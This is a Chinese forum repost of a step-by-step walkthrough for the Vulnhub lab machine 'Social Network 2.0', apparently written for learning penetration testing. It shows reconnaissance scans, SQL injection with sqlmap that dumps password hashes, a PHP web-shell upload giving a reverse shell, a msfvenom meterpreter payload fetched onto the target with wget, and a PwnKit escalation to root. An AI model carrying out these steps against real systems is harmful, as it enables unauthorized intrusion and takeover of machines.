ToB企服应用市场:ToB评测及商务社交产业平台

标题: Vulnhub之 BoredHackerBlog: Social Network 2.0靶机详细测试过程 [打印本页]

---

作者: 悠扬随风    时间: 2023-4-23 20:51
标题: Vulnhub之 BoredHackerBlog: Social Network 2.0靶机详细测试过程
Socnet

作者：jason huawen
靶机信息

名称：BoredHackerBlog: Social Network 2.0
地址：

1. https://www.vulnhub.com/entry/boredhackerblog-social-network-20,455/

复制代码

识别目标主机IP地址

1. (kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3. Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                       
4.                                                                                                                                                             
5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
6. _____________________________________________________________________________
7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
8. -----------------------------------------------------------------------------
9. 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                          
10. 192.168.56.100  08:00:27:26:b1:cb      1      60  PCS Systemtechnik GmbH                                                                                   
11. 192.168.56.169  08:00:27:5b:b3:1b      1      60  PCS Systemtechnik GmbH                                                                                   

复制代码

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.169
NMAP扫描

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.169 -oN nmap_full_scan
3. Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-22 21:56 EDT
4. Nmap scan report for bogon (192.168.56.169)
5. Host is up (0.00040s latency).
6. Not shown: 65532 closed tcp ports (reset)
7. PORT     STATE SERVICE VERSION
8. 22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
9. | ssh-hostkey:
10. |   2048 e5:d3:4e:54:fe:66:3e:f3:b2:a5:4b:51:9f:5f:f9:c6 (RSA)
11. |   256 de:86:ef:76:93:63:74:83:00:b1:a3:b8:c2:4c:8f:58 (ECDSA)
12. |_  256 b5:ec:f1:1e:9a:5a:5c:d7:02:3a:9e:1b:f7:c8:b4:53 (ED25519)
13. 80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
14. |_http-server-header: Apache/2.4.29 (Ubuntu)
15. |_http-title: Social Network
16. | http-cookie-flags:
17. |   /:
18. |     PHPSESSID:
19. |_      httponly flag not set
20. 8000/tcp open  http    BaseHTTPServer 0.3 (Python 2.7.15rc1)
21. |_http-server-header: BaseHTTP/0.3 Python/2.7.15rc1
22. |_xmlrpc-methods: XMLRPC instance doesn't support introspection.
23. |_http-title: Error response
24. MAC Address: 08:00:27:5B:B3:1B (Oracle VirtualBox virtual NIC)
25. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
27. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
28. Nmap done: 1 IP address (1 host up) scanned in 12.76 seconds

复制代码

NMAP扫描结果表明目标主机有3个开放端口：22（ssh)、80(http)、8000(http)
获得Shell

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
2. └─$ nikto -h http://192.168.56.169
3. - Nikto v2.1.6
4. ---------------------------------------------------------------------------
5. + Target IP:          192.168.56.169
6. + Target Hostname:    192.168.56.169
7. + Target Port:        80
8. + Start Time:         2023-04-22 22:00:39 (GMT-4)
9. ---------------------------------------------------------------------------
10. + Server: Apache/2.4.29 (Ubuntu)
11. + The anti-clickjacking X-Frame-Options header is not present.
12. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
13. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
14. + Cookie PHPSESSID created without the httponly flag
15. + No CGI Directories found (use '-C all' to force check all possible dirs)
16. + Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
17. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
18. + OSVDB-3268: /data/: Directory indexing found.
19. + OSVDB-3092: /data/: This might be interesting...
20. + OSVDB-3268: /includes/: Directory indexing found.
21. + OSVDB-3092: /includes/: This might be interesting...
22. + OSVDB-3268: /database/: Directory indexing found.
23. + OSVDB-3093: /database/: Databases? Really??
24. + OSVDB-3268: /images/: Directory indexing found.
25. + OSVDB-3233: /icons/README: Apache default file found.
26. + 7915 requests: 0 error(s) and 14 item(s) reported on remote host
27. + End Time:           2023-04-22 22:01:42 (GMT-4) (63 seconds)
28. ---------------------------------------------------------------------------

复制代码

/databases/目录中有2个sql文件，将其下载到本地

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
2. └─$ cat DML.sql
3. INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate)
4.        VALUES ("Armin", "Virgil", "armin@gmail.com", "M", "2001-02-05");
5. INSERT INTO users(user_firstname, user_lastname, user_nickname, user_password, user_email, user_gender, user_birthdate, user_status)
6.        VALUES ("Paul", "James", "Pynch", "paul@gmail.com", "M", "1998-12-19", "S");
7. INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate)
8.        VALUES ("Chris", "Wilson", "chris@gmail.com", "M", "1996-01-18");
9. INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate, user_status)
10.        VALUES ("Rory", "Blue", "rory@gmail.com", "F", "1994-04-18", "M");
11. INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate)
12.        VALUES ("Andrea", "Surman", "andrea@gmail.com", "M", "1994-06-06");

复制代码

Insert语句中，并没有密码值，有点奇怪。

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
2. └─$ gobuster dir -u http://192.168.56.169 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.txt,.js,.bak        
3. ===============================================================
4. Gobuster v3.5
5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6. ===============================================================
7. [+] Url:                     http://192.168.56.169
8. [+] Method:                  GET
9. [+] Threads:                 10
10. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
11. [+] Negative Status codes:   404
12. [+] User Agent:              gobuster/3.5
13. [+] Extensions:              php,html,js,txt,bak
14. [+] Timeout:                 10s
15. ===============================================================
16. 2023/04/22 22:06:30 Starting gobuster in directory enumeration mode
17. ===============================================================
18. /.php                 (Status: 403) [Size: 293]
19. /images               (Status: 301) [Size: 317] [--> http://192.168.56.169/images/]
20. /.html                (Status: 403) [Size: 294]
21. /index.php            (Status: 200) [Size: 10609]
22. /search.php           (Status: 302) [Size: 1490] [--> index.php]
23. /home.php             (Status: 302) [Size: 4234] [--> index.php]
24. /resources            (Status: 301) [Size: 320] [--> http://192.168.56.169/resources/]
25. /profile.php          (Status: 302) [Size: 2845] [--> index.php]
26. /data                 (Status: 301) [Size: 315] [--> http://192.168.56.169/data/]
27. /includes             (Status: 301) [Size: 319] [--> http://192.168.56.169/includes/]
28. /friends.php          (Status: 302) [Size: 1669] [--> index.php]
29. /database             (Status: 301) [Size: 319] [--> http://192.168.56.169/database/]
30. /logout.php           (Status: 302) [Size: 0] [--> index.php]
31. /functions            (Status: 301) [Size: 320] [--> http://192.168.56.169/functions/]
32. /requests.php         (Status: 302) [Size: 1719] [--> index.php]
33. /.php                 (Status: 403) [Size: 293]
34. /.html                (Status: 403) [Size: 294]
35. /server-status        (Status: 403) [Size: 302]
36. Progress: 1322305 / 1323366 (99.92%)
37. ===============================================================

复制代码

Gobuster工具没有扫描出有价值的信息。

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
2. └─$ curl http://192.168.56.169:8000/     
3. <head>
4. <title>Error response</title>
5. </head>
6. <body>
7. <h1>Error response</h1>
8. <p>Error code 501.
9. <p>Message: Unsupported method ('GET').
10. <p>Error code explanation: 501 = Server does not support this operation.
11. </body>

复制代码

不支持GET方法？那用burpsuite拦截请求，修改为POST
但是返回是空的，没有任何内容
利用Gobuster工具，并且这只-m 请求方法参数，对8000端口进行扫描
注册一个新用户，然后登陆，有个搜索功能，貌似有SQL注入漏洞，用burpsuite拦截请求，并存储为文件

1. http://192.168.56.169/search.php?location=emails&query=test

复制代码

1. (kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
2. └─$ sqlmap -r req.txt --level=3

复制代码

经测试，目标主机存在SQL注入漏洞

1. ─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
2. └─$ sqlmap -r req.txt --level=3 --dbsavailable databases [5]:
3. [*] information_schema
4. [*] mysql
5. [*] performance_schema
6. [*] socialnetwork
7. [*] sys

复制代码

1. ─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
2. └─$ sqlmap -r req.txt --level=3 -D socialnetwork --tablesDatabase: socialnetwork[4 tables]+------------+| friendship || posts      || user_phone || users      |+------------+

复制代码

1. ─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
2. └─$ sqlmap -r req.txt --level=3 -D socialnetwork -T users --columnsDatabase: socialnetworkTable: users[11 columns]+----------------+--------------+| Column         | Type         |+----------------+--------------+| user_about     | text         || user_birthdate | date         || user_email     | varchar(255) || user_firstname | varchar(20)  || user_gender    | char(1)      || user_hometown  | varchar(255) || user_id        | int(11)      || user_lastname  | varchar(20)  || user_nickname  | varchar(20)  || user_password  | varchar(255) || user_status    | char(1)      |+----------------+--------------+

复制代码

1. ─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
2. └─$ sqlmap -r req.txt --level=3 -D socialnetwork -T users -C user_email,user_password --dumpTable: users[3 entries]+------------------------+----------------------------------+| user_email             | user_password                    |+------------------------+----------------------------------+| admin@localhost.com    | 21232f297a57a5a743894a0e4a801fc3 || testuser@localhost.com | 5d9c68c6c50ed3d02a2fcf54f63993b6 || test@test.com          | e10adc3949ba59abbe56e057f20f883e |+------------------------+----------------------------------+

复制代码

用在线网站解密，admin@localhost.com的密码为admin,成功登陆，在profile上可以上传图片，看能否将shell.php上传
没有任何过滤机制，成功上传shell.php文件，拿到目标主机反弹的shell

1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
2. └─$ sudo nc -nlvp 5555                                                                     
3. [sudo] password for kali:
4. listening on [any] 5555 ...
5. connect to [192.168.56.230] from (UNKNOWN) [192.168.56.169] 38434
6. Linux socnet2 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
7. 02:40:11 up 47 min,  0 users,  load average: 0.05, 0.31, 0.75
8. USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
9. uid=33(www-data) gid=33(www-data) groups=33(www-data)
10. /bin/sh: 0: can't access tty; job control turned off
11. $ which python
12. /usr/bin/python
13. $ python -c 'import pty;pty.spawn("/bin/bash")'
14. www-data@socnet2:/$ cd /home
15. cd /home
16. www-data@socnet2:/home$ ls -alh
17. ls -alh
18. total 12K
19. drwxr-xr-x  3 root   root   4.0K Oct 29  2018 .
20. drwxr-xr-x 25 root   root   4.0K Oct 29  2018 ..
21. drwxr-xr-x  6 socnet socnet 4.0K Oct 29  2018 socnet

复制代码

提权

1. ──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
2. └─$ msfvenom -p  linux/x86/meterpreter/reverse_tcp  LHOST=192.168.56.230 LPORT=6666 -f elf -o escalate.elf

复制代码

创建payload后，将其上传到目标主机/tmp目录下

1. www-data@socnet2:/tmp$ wget http://192.168.56.230:8000/escalate.elf
2. wget http://192.168.56.230:8000/escalate.elf
3. --2023-04-23 02:55:00--  http://192.168.56.230:8000/escalate.elf
4. Connecting to 192.168.56.230:8000... connected.
5. HTTP request sent, awaiting response... 200 OK
6. Length: 207 [application/octet-stream]
7. Saving to: 'escalate.elf'
9. escalate.elf        100%[===================>]     207  --.-KB/s    in 0s      
11. 2023-04-23 02:55:00 (39.3 MB/s) - 'escalate.elf' saved [207/207]
13. www-data@socnet2:/tmp$ chmod +x escalate.elf
14. chmod +x escalate.elf

复制代码

执行该文件得到meterpreter会话，然后利用suggester定位可以提权的模块

1. msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
2. msf6 post(multi/recon/local_exploit_suggester) > show options
4. Module options (post/multi/recon/local_exploit_suggester):
6.    Name             Current Setting  Required  Description
7.    ----             ---------------  --------  -----------
8.    SESSION                           yes       The session to run this module on
9.    SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits
11. msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
12. SESSION => 1
13. msf6 post(multi/recon/local_exploit_suggester) > run
15. [*] 192.168.56.169 - Collecting local exploits for x86/linux...
16. [*] 192.168.56.169 - 167 exploit checks are being tried...
17. [+] 192.168.56.169 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
18. [+] 192.168.56.169 - exploit/linux/local/nested_namespace_idmap_limit_priv_esc: The target appears to be vulnerable.
19. [+] 192.168.56.169 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
20. [+] 192.168.56.169 - exploit/linux/local/pkexec: The service is running, but could not be validated.
21. [+] 192.168.56.169 - exploit/linux/local/su_login: The target appears to be vulnerable.
22. [*] Running check method for exploit 48 / 48
23. [*] 192.168.56.169 - Valid modules for session 1:
24. ============================
26. #   Name                                                               Potentially Vulnerable?  Check Result
27. -   ----                                                               -----------------------  ------------
28. 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.

复制代码

1. msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
2. [*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
3. msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options
5. Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):
7.    Name          Current Setting  Required  Description
8.    ----          ---------------  --------  -----------
9.    PKEXEC_PATH                    no        The path to pkexec binary
10.    SESSION                        yes       The session to run this module on
11.    WRITABLE_DIR  /tmp             yes       A directory where we can write files
14. Payload options (linux/x64/meterpreter/reverse_tcp):
16.    Name   Current Setting  Required  Description
17.    ----   ---------------  --------  -----------
18.    LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
19.    LPORT  4444             yes       The listen port
22. Exploit target:
24.    Id  Name
25.    --  ----
26.    0   x86_64
29. msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230
30. LHOST => 192.168.56.230
31. msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888
32. LPORT => 8888
33. msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
34. SESSION => 1
35. msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
37. [*] Started reverse TCP handler on 192.168.56.230:8888
38. [*] Running automatic check ("set AutoCheck false" to disable)
39. [!] Verify cleanup of /tmp/.dmofmj
40. [+] The target is vulnerable.
41. [*] Writing '/tmp/.ebvnqpec/rqmsyuzae/rqmsyuzae.so' (548 bytes) ...
42. [!] Verify cleanup of /tmp/.ebvnqpec
43. [*] Sending stage (3020772 bytes) to 192.168.56.169
44. [+] Deleted /tmp/.ebvnqpec/rqmsyuzae/rqmsyuzae.so
45. [+] Deleted /tmp/.ebvnqpec/.omnoepjvoqxi
46. [+] Deleted /tmp/.ebvnqpec
47. [*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.169:33970) at 2023-04-23 02:30:11 -0400
49. meterpreter > shell
50. Process 1899 created.
51. Channel 1 created.
52. id
53. uid=0(root) gid=0(root) groups=0(root),33(www-data)
54. cd /root
55. ls -alh
56. total 32K
57. drwx------  4 root root 4.0K Oct 29  2018 .
58. drwxr-xr-x 25 root root 4.0K Oct 29  2018 ..
59. -rw-------  1 root root    5 Oct 29  2018 .bash_history
60. -rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
61. drwxr-xr-x  3 root root 4.0K Oct 29  2018 .local
62. -rw-------  1 root root  128 Oct 29  2018 .mysql_history
63. -rw-r--r--  1 root root  148 Aug 17  2015 .profile
64. drwx------  2 root root 4.0K Oct 29  2018 .ssh

复制代码

至此拿到了root shell和root flag

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！

---

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)

Powered by Discuz! X3.4